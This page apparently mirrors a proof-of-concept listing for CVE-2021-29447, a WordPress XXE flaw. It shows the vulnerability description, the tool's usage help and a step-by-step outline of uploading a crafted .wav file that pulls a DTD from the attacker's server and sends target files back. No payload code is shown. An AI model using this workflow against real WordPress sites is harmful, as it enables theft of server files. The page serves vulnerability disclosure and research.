Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-29447 PoC — WordPress Authenticated XXE attack when installation is running PHP 8

Source
https://github.com/b-abderrahmane/CVE-2021-29447-POC
Associated Vulnerability
Title:WordPress Authenticated XXE attack when installation is running PHP 8 (CVE-2021-29447)
Description:Wordpress is an open source CMS. A user with the ability to upload files (like an Author) can exploit an XML parsing issue in the Media Library leading to XXE attacks. This requires WordPress installation to be using PHP 8. Access to internal files is possible in a successful XXE attack. This has been patched in WordPress version 5.7.1, along with the older affected versions via a minor release. We strongly recommend you keep auto-updates enabled.
Readme
# CVE-2021-29447-POC

## About

This script automates the required steps to exploit [CVE-2021-29447](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29447) in the media upload funnctionality in Wordpress and use it to extract files vi an XXE.

## Usage

```
 ./generate_payloads.py --help
usage: generate_payloads.py [-h] [--local-ip LOCAL_IP] [--local-port LOCAL_PORT] [--media-payload MEDIA_PAYLOAD] [--dtd-payload DTD_PAYLOAD]
                            [--files-to-fetch FILES_TO_FETCH [FILES_TO_FETCH ...]]

CVE-2021-29447 payload generator

options:
  -h, --help            show this help message and exit
  --local-ip LOCAL_IP   Local machine IP address
  --local-port LOCAL_PORT
                        Local machine port which will run an HTTP server to receive the exfiltrated files
  --media-payload MEDIA_PAYLOAD
                        Name of the .wav file containing the exploit to be generated
  --dtd-payload DTD_PAYLOAD
                        Name of the .dtd file containing the exploit to be generated
  --files-to-fetch FILES_TO_FETCH [FILES_TO_FETCH ...]
```

The script does the following:

- First step: It generates a .wav payload you need to upload to the target server. You can use `--media-payload` to pass its name.
- Second step: It generates a DTD document which will be server via an http server locally. You can use `--dtd-payload` to pass its name. This file will contain the absolute paths of the files you would like to extract from the target machine, you can specific a list of comma separated files via `--files-to-fetch`
- Third step: It runs a simple Python HTTP server to which the `.wav` payload will connect back to both to fetch the second part of the payload (the DTD document) and to send the fetched files from the remote system.
- Fourth step: If all of the files you specified exist on the remote filesystem, these files will be sent back to the HTTP server in a B64 encoded format, the script will then decode them and save them to your current working directory.

## Disclaimer

This software has been created purely for the purposes of research and for the development of effective mitigation techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.
File Snapshot

 [4.0K]  /data/pocs/cc7ca7730fe0ad648adc56849b2b8ef83679f0ec
├── [ 699]  colored_formatter.py
├── [5.9K]  generate_payloads.py
└── [2.3K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →